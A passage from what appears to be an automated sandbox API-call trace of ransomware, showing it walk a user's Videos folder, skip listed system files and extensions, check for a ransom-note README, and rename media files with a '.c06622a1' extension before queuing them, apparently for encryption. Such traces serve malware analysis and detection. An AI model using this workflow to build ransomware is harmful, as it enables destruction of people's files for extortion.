_Str2="3vvtB.swf") returned 49 [0156.640] wcslen (_String="desktop.ini") returned 0xb [0156.640] _wcsicmp (_Str1="iconcache.db", _Str2="3vvtB.swf") returned 54 [0156.640] wcslen (_String="iconcache.db") returned 0xc [0156.640] _wcsicmp (_Str1="ntldr", _Str2="3vvtB.swf") returned 59 [0156.640] wcslen (_String="ntldr") returned 0x5 [0156.640] _wcsicmp (_Str1="ntuser.dat", _Str2="3vvtB.swf") returned 59 [0156.640] wcslen (_String="ntuser.dat") returned 0xa [0156.640] _wcsicmp (_Str1="ntuser.dat.log", _Str2="3vvtB.swf") returned 59 [0156.640] wcslen (_String="ntuser.dat.log") returned 0xe [0156.640] _wcsicmp (_Str1="ntuser.ini", _Str2="3vvtB.swf") returned 59 [0156.640] wcslen (_String="ntuser.ini") returned 0xa [0156.640] _wcsicmp (_Str1="thumbs.db", _Str2="3vvtB.swf") returned 65 [0156.640] wcslen (_String="thumbs.db") returned 0x9 [0156.640] _wcsicmp (_Str1="386", _Str2="swf") returned -64 [0156.640] wcslen (_String="386") returned 0x3 [0156.640] _wcsicmp (_Str1="adv", _Str2="swf") returned -18 [0156.640] wcslen (_String="adv") returned 0x3 [0156.640] _wcsicmp (_Str1="ani", _Str2="swf") returned -18 [0156.640] wcslen (_String="ani") returned 0x3 [0156.640] _wcsicmp (_Str1="bat", _Str2="swf") returned -17 [0156.640] wcslen (_String="bat") returned 0x3 [0156.640] _wcsicmp (_Str1="bin", _Str2="swf") returned -17 [0156.640] wcslen (_String="bin") returned 0x3 [0156.640] _wcsicmp (_Str1="cab", _Str2="swf") returned -16 [0156.640] wcslen (_String="cab") returned 0x3 [0156.640] _wcsicmp (_Str1="cmd", _Str2="swf") returned -16 [0156.641] wcslen (_String="cmd") returned 0x3 [0156.641] _wcsicmp (_Str1="com", _Str2="swf") returned -16 [0156.641] wcslen (_String="com") returned 0x3 [0156.641] _wcsicmp (_Str1="cpl", _Str2="swf") returned -16 [0156.641] wcslen (_String="cpl") returned 0x3 [0156.641] _wcsicmp (_Str1="cur", _Str2="swf") returned -16 [0156.641] wcslen (_String="cur") returned 0x3 [0156.641] _wcsicmp (_Str1="deskthemepack", _Str2="swf") returned -15 [0156.641] wcslen (_String="deskthemepack") returned 0xd [0156.641] _wcsicmp (_Str1="diagcab", _Str2="swf") returned -15 [0156.641] wcslen (_String="diagcab") returned 0x7 [0156.641] _wcsicmp (_Str1="diagcfg", _Str2="swf") returned -15 [0156.641] wcslen (_String="diagcfg") returned 0x7 [0156.641] _wcsicmp (_Str1="diagpkg", _Str2="swf") returned -15 [0156.641] wcslen (_String="diagpkg") returned 0x7 [0156.641] _wcsicmp (_Str1="dll", _Str2="swf") returned -15 [0156.641] wcslen (_String="dll") returned 0x3 [0156.641] _wcsicmp (_Str1="drv", _Str2="swf") returned -15 [0156.641] wcslen (_String="drv") returned 0x3 [0156.641] _wcsicmp (_Str1="exe", _Str2="swf") returned -14 [0156.641] wcslen (_String="exe") returned 0x3 [0156.641] _wcsicmp (_Str1="hlp", _Str2="swf") returned -11 [0156.641] wcslen (_String="hlp") returned 0x3 [0156.641] _wcsicmp (_Str1="icl", _Str2="swf") returned -10 [0156.641] wcslen (_String="icl") returned 0x3 [0156.641] _wcsicmp (_Str1="icns", _Str2="swf") returned -10 [0156.641] wcslen (_String="icns") returned 0x4 [0156.641] _wcsicmp (_Str1="ico", _Str2="swf") returned -10 [0156.641] wcslen (_String="ico") returned 0x3 [0156.641] _wcsicmp (_Str1="ics", _Str2="swf") returned -10 [0156.641] wcslen (_String="ics") returned 0x3 [0156.641] _wcsicmp (_Str1="idx", _Str2="swf") returned -10 [0156.641] wcslen (_String="idx") returned 0x3 [0156.641] _wcsicmp (_Str1="ldf", _Str2="swf") returned -7 [0156.641] wcslen (_String="ldf") returned 0x3 [0156.641] _wcsicmp (_Str1="lnk", _Str2="swf") returned -7 [0156.641] wcslen (_String="lnk") returned 0x3 [0156.641] _wcsicmp (_Str1="mod", _Str2="swf") returned -6 [0156.641] wcslen (_String="mod") returned 0x3 [0156.642] _wcsicmp (_Str1="mpa", _Str2="swf") returned -6 [0156.642] wcslen (_String="mpa") returned 0x3 [0156.642] _wcsicmp (_Str1="msc", _Str2="swf") returned -6 [0156.642] wcslen (_String="msc") returned 0x3 [0156.642] _wcsicmp (_Str1="msp", _Str2="swf") returned -6 [0156.642] wcslen (_String="msp") returned 0x3 [0156.642] _wcsicmp (_Str1="msstyles", _Str2="swf") returned -6 [0156.642] wcslen (_String="msstyles") returned 0x8 [0156.642] _wcsicmp (_Str1="msu", _Str2="swf") returned -6 [0156.642] wcslen (_String="msu") returned 0x3 [0156.642] _wcsicmp (_Str1="nls", _Str2="swf") returned -5 [0156.642] wcslen (_String="nls") returned 0x3 [0156.642] _wcsicmp (_Str1="nomedia", _Str2="swf") returned -5 [0156.642] wcslen (_String="nomedia") returned 0x7 [0156.642] _wcsicmp (_Str1="ocx", _Str2="swf") returned -4 [0156.642] wcslen (_String="ocx") returned 0x3 [0156.642] _wcsicmp (_Str1="prf", _Str2="swf") returned -3 [0156.642] wcslen (_String="prf") returned 0x3 [0156.642] _wcsicmp (_Str1="ps1", _Str2="swf") returned -3 [0156.642] wcslen (_String="ps1") returned 0x3 [0156.642] _wcsicmp (_Str1="rom", _Str2="swf") returned -1 [0156.642] wcslen (_String="rom") returned 0x3 [0156.642] _wcsicmp (_Str1="rtp", _Str2="swf") returned -1 [0156.642] wcslen (_String="rtp") returned 0x3 [0156.642] _wcsicmp (_Str1="scr", _Str2="swf") returned -20 [0156.642] wcslen (_String="scr") returned 0x3 [0156.642] _wcsicmp (_Str1="shs", _Str2="swf") returned -15 [0156.642] wcslen (_String="shs") returned 0x3 [0156.642] _wcsicmp (_Str1="spl", _Str2="swf") returned -7 [0156.642] wcslen (_String="spl") returned 0x3 [0156.642] _wcsicmp (_Str1="sys", _Str2="swf") returned 2 [0156.642] wcslen (_String="sys") returned 0x3 [0156.642] _wcsicmp (_Str1="theme", _Str2="swf") returned 1 [0156.642] wcslen (_String="theme") returned 0x5 [0156.642] _wcsicmp (_Str1="themepack", _Str2="swf") returned 1 [0156.642] wcslen (_String="themepack") returned 0x9 [0156.642] _wcsicmp (_Str1="wpx", _Str2="swf") returned 4 [0156.643] wcslen (_String="wpx") returned 0x3 [0156.643] _wcsicmp (_Str1="lock", _Str2="swf") returned -7 [0156.643] wcslen (_String="lock") returned 0x4 [0156.643] _wcsicmp (_Str1="key", _Str2="swf") returned -8 [0156.643] wcslen (_String="key") returned 0x3 [0156.643] _wcsicmp (_Str1="hta", _Str2="swf") returned -11 [0156.643] wcslen (_String="hta") returned 0x3 [0156.643] _wcsicmp (_Str1="msi", _Str2="swf") returned -6 [0156.643] wcslen (_String="msi") returned 0x3 [0156.643] _wcsicmp (_Str1="pdb", _Str2="swf") returned -3 [0156.643] wcslen (_String="pdb") returned 0x3 [0156.643] _wcsicmp (_Str1="sql", _Str2="swf") returned -6 [0156.643] wcslen (_String="sql") returned 0x3 [0156.643] _wcsicmp (_Str1="sqlite", _Str2="swf") returned -6 [0156.643] wcslen (_String="sqlite") returned 0x6 [0156.643] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6")) returned 0x10 [0156.643] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45900d8 [0156.643] wcscpy (in: _Dest=0x45900d8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" [0156.643] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6") returned 0x52 [0156.643] wcscpy (in: _Dest=0x459017e, _Source="3vvtB.swf" | out: _Dest="3vvtB.swf") returned="3vvtB.swf" [0156.643] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\3vvtB.swf", dwFileAttributes=0x80) returned 1 [0156.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\3vvtB.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\3vvtb.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0156.644] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.644] ReadFile (in: hFile=0x63c, lpBuffer=0x3fe174, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe204, lpOverlapped=0x0 | out: lpBuffer=0x3fe174*, lpNumberOfBytesRead=0x3fe204*=0x90, lpOverlapped=0x0) returned 1 [0156.645] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe174, Length=0x80) returned 0x2bacc268 [0156.645] RtlComputeCrc32 (PartialCrc=0xc268, Buffer=0x3fe174, Length=0x80) returned 0x5e001464 [0156.645] RtlComputeCrc32 (PartialCrc=0x1464, Buffer=0x3fe174, Length=0x80) returned 0xfb11a1aa [0156.645] RtlComputeCrc32 (PartialCrc=0xa1aa, Buffer=0x3fe174, Length=0x80) returned 0x9e242f32 [0156.645] RtlComputeCrc32 (PartialCrc=0x2f32, Buffer=0x3fe174, Length=0x80) returned 0x47cedd55 [0156.645] CloseHandle (hObject=0x63c) returned 1 [0156.645] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45a00e0 [0156.645] wcscpy (in: _Dest=0x45a00e0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\3vvtB.swf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\3vvtB.swf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\3vvtB.swf" [0156.645] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\3vvtB.swf") returned 0x5c [0156.645] wcscpy (in: _Dest=0x45a0198, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.645] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\3vvtB.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\3vvtb.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\3vvtB.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\3vvtb.swf.c06622a1"), dwFlags=0x8) returned 1 [0156.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\3vvtB.swf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\3vvtb.swf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x63c [0156.650] CreateIoCompletionPort (FileHandle=0x63c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.650] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4820020 [0156.655] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x76318421 [0156.656] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x46c91b6e [0156.656] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2b23620a [0156.656] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x630859ed [0156.656] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4165b568 [0156.656] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x18c81911 [0156.656] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7a19c8f2 [0156.656] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4da6f9fa [0156.659] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4820094, Length=0x80) returned 0x688f2eee [0156.659] RtlComputeCrc32 (PartialCrc=0x2eee, Buffer=0x4820094, Length=0x80) returned 0xc80da38 [0156.659] RtlComputeCrc32 (PartialCrc=0xda38, Buffer=0x4820094, Length=0x80) returned 0x25eab3d9 [0156.659] RtlComputeCrc32 (PartialCrc=0xb3d9, Buffer=0x4820094, Length=0x80) returned 0x354c5c [0156.659] RtlComputeCrc32 (PartialCrc=0x4c5c, Buffer=0x4820094, Length=0x80) returned 0xec7c75dc [0156.659] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0156.659] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45900d8) returned 1 [0156.659] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45a00e0) returned 1 [0156.659] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2164e8f0, ftCreationTime.dwHighDateTime=0x1d5d99a, ftLastAccessTime.dwLowDateTime=0x7359a60, ftLastAccessTime.dwHighDateTime=0x1d5e660, ftLastWriteTime.dwLowDateTime=0x7359a60, ftLastWriteTime.dwHighDateTime=0x1d5e660, nFileSizeHigh=0x0, nFileSizeLow=0x2caf, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-qA 6xhtA1BI.mkv", cAlternateFileName="4-QA6X~1.MKV")) returned 1 [0156.659] _wcsicmp (_Str1="4-qA 6xhtA1BI.mkv", _Str2="README.c06622a1.TXT") returned -62 [0156.659] wcsstr (_Str="4-qA 6xhtA1BI.mkv", _SubStr="README") returned 0x0 [0156.659] _wcsicmp (_Str1="autorun.inf", _Str2="4-qA 6xhtA1BI.mkv") returned 45 [0156.659] wcslen (_String="autorun.inf") returned 0xb [0156.659] _wcsicmp (_Str1="boot.ini", _Str2="4-qA 6xhtA1BI.mkv") returned 46 [0156.659] wcslen (_String="boot.ini") returned 0x8 [0156.659] _wcsicmp (_Str1="bootfont.bin", _Str2="4-qA 6xhtA1BI.mkv") returned 46 [0156.659] wcslen (_String="bootfont.bin") returned 0xc [0156.659] _wcsicmp (_Str1="bootsect.bak", _Str2="4-qA 6xhtA1BI.mkv") returned 46 [0156.659] wcslen (_String="bootsect.bak") returned 0xc [0156.659] _wcsicmp (_Str1="desktop.ini", _Str2="4-qA 6xhtA1BI.mkv") returned 48 [0156.659] wcslen (_String="desktop.ini") returned 0xb [0156.659] _wcsicmp (_Str1="iconcache.db", _Str2="4-qA 6xhtA1BI.mkv") returned 53 [0156.659] wcslen (_String="iconcache.db") returned 0xc [0156.660] _wcsicmp (_Str1="ntldr", _Str2="4-qA 6xhtA1BI.mkv") returned 58 [0156.660] wcslen (_String="ntldr") returned 0x5 [0156.660] _wcsicmp (_Str1="ntuser.dat", _Str2="4-qA 6xhtA1BI.mkv") returned 58 [0156.660] wcslen (_String="ntuser.dat") returned 0xa [0156.660] _wcsicmp (_Str1="ntuser.dat.log", _Str2="4-qA 6xhtA1BI.mkv") returned 58 [0156.660] wcslen (_String="ntuser.dat.log") returned 0xe [0156.660] _wcsicmp (_Str1="ntuser.ini", _Str2="4-qA 6xhtA1BI.mkv") returned 58 [0156.660] wcslen (_String="ntuser.ini") returned 0xa [0156.660] _wcsicmp (_Str1="thumbs.db", _Str2="4-qA 6xhtA1BI.mkv") returned 64 [0156.660] wcslen (_String="thumbs.db") returned 0x9 [0156.660] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0156.660] wcslen (_String="386") returned 0x3 [0156.660] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0156.660] wcslen (_String="adv") returned 0x3 [0156.660] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0156.660] wcslen (_String="ani") returned 0x3 [0156.660] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0156.660] wcslen (_String="bat") returned 0x3 [0156.660] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0156.660] wcslen (_String="bin") returned 0x3 [0156.660] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0156.660] wcslen (_String="cab") returned 0x3 [0156.660] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0156.660] wcslen (_String="cmd") returned 0x3 [0156.660] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0156.660] wcslen (_String="com") returned 0x3 [0156.660] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0156.660] wcslen (_String="cpl") returned 0x3 [0156.660] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0156.660] wcslen (_String="cur") returned 0x3 [0156.660] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0156.660] wcslen (_String="deskthemepack") returned 0xd [0156.660] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0156.661] wcslen (_String="diagcab") returned 0x7 [0156.661] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0156.661] wcslen (_String="diagcfg") returned 0x7 [0156.661] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0156.661] wcslen (_String="diagpkg") returned 0x7 [0156.661] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0156.661] wcslen (_String="dll") returned 0x3 [0156.661] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0156.661] wcslen (_String="drv") returned 0x3 [0156.661] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0156.661] wcslen (_String="exe") returned 0x3 [0156.661] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0156.661] wcslen (_String="hlp") returned 0x3 [0156.661] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0156.661] wcslen (_String="icl") returned 0x3 [0156.661] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0156.661] wcslen (_String="icns") returned 0x4 [0156.661] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0156.661] wcslen (_String="ico") returned 0x3 [0156.661] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0156.661] wcslen (_String="ics") returned 0x3 [0156.661] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0156.661] wcslen (_String="idx") returned 0x3 [0156.661] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0156.661] wcslen (_String="ldf") returned 0x3 [0156.661] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0156.661] wcslen (_String="lnk") returned 0x3 [0156.661] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0156.661] wcslen (_String="mod") returned 0x3 [0156.661] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0156.661] wcslen (_String="mpa") returned 0x3 [0156.661] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0156.661] wcslen (_String="msc") returned 0x3 [0156.662] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0156.662] wcslen (_String="msp") returned 0x3 [0156.662] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0156.662] wcslen (_String="msstyles") returned 0x8 [0156.662] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0156.662] wcslen (_String="msu") returned 0x3 [0156.662] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0156.662] wcslen (_String="nls") returned 0x3 [0156.662] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0156.662] wcslen (_String="nomedia") returned 0x7 [0156.662] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0156.662] wcslen (_String="ocx") returned 0x3 [0156.662] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0156.662] wcslen (_String="prf") returned 0x3 [0156.662] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0156.662] wcslen (_String="ps1") returned 0x3 [0156.662] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0156.662] wcslen (_String="rom") returned 0x3 [0156.662] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0156.662] wcslen (_String="rtp") returned 0x3 [0156.662] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0156.662] wcslen (_String="scr") returned 0x3 [0156.662] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0156.662] wcslen (_String="shs") returned 0x3 [0156.662] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0156.662] wcslen (_String="spl") returned 0x3 [0156.662] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0156.662] wcslen (_String="sys") returned 0x3 [0156.662] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0156.662] wcslen (_String="theme") returned 0x5 [0156.662] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0156.662] wcslen (_String="themepack") returned 0x9 [0156.663] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0156.663] wcslen (_String="wpx") returned 0x3 [0156.663] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0156.663] wcslen (_String="lock") returned 0x4 [0156.663] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0156.663] wcslen (_String="key") returned 0x3 [0156.663] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0156.663] wcslen (_String="hta") returned 0x3 [0156.663] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0156.663] wcslen (_String="msi") returned 0x3 [0156.663] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0156.663] wcslen (_String="pdb") returned 0x3 [0156.663] _wcsicmp (_Str1="sql", _Str2="mkv") returned 6 [0156.663] wcslen (_String="sql") returned 0x3 [0156.663] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0156.663] wcslen (_String="sqlite") returned 0x6 [0156.663] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6")) returned 0x10 [0156.663] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45900d8 [0156.663] wcscpy (in: _Dest=0x45900d8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" [0156.663] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6") returned 0x52 [0156.663] wcscpy (in: _Dest=0x459017e, _Source="4-qA 6xhtA1BI.mkv" | out: _Dest="4-qA 6xhtA1BI.mkv") returned="4-qA 6xhtA1BI.mkv" [0156.663] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\4-qA 6xhtA1BI.mkv", dwFileAttributes=0x80) returned 1 [0156.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\4-qA 6xhtA1BI.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\4-qa 6xhta1bi.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e0 [0156.664] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.664] ReadFile (in: hFile=0x2e0, lpBuffer=0x3fe174, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe204, lpOverlapped=0x0 | out: lpBuffer=0x3fe174*, lpNumberOfBytesRead=0x3fe204*=0x90, lpOverlapped=0x0) returned 1 [0156.665] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe174, Length=0x80) returned 0x3368767f [0156.665] RtlComputeCrc32 (PartialCrc=0x767f, Buffer=0x3fe174, Length=0x80) returned 0x8f7a5013 [0156.665] RtlComputeCrc32 (PartialCrc=0x5013, Buffer=0x3fe174, Length=0x80) returned 0xc669b0b3 [0156.665] RtlComputeCrc32 (PartialCrc=0xb0b3, Buffer=0x3fe174, Length=0x80) returned 0x47663808 [0156.665] RtlComputeCrc32 (PartialCrc=0x3808, Buffer=0x3fe174, Length=0x80) returned 0x16c5c864 [0156.665] CloseHandle (hObject=0x2e0) returned 1 [0156.665] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45a00e0 [0156.665] wcscpy (in: _Dest=0x45a00e0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\4-qA 6xhtA1BI.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\4-qA 6xhtA1BI.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\4-qA 6xhtA1BI.mkv" [0156.665] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\4-qA 6xhtA1BI.mkv") returned 0x64 [0156.665] wcscpy (in: _Dest=0x45a01a8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.665] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\4-qA 6xhtA1BI.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\4-qa 6xhta1bi.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\4-qA 6xhtA1BI.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\4-qa 6xhta1bi.mkv.c06622a1"), dwFlags=0x8) returned 1 [0156.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 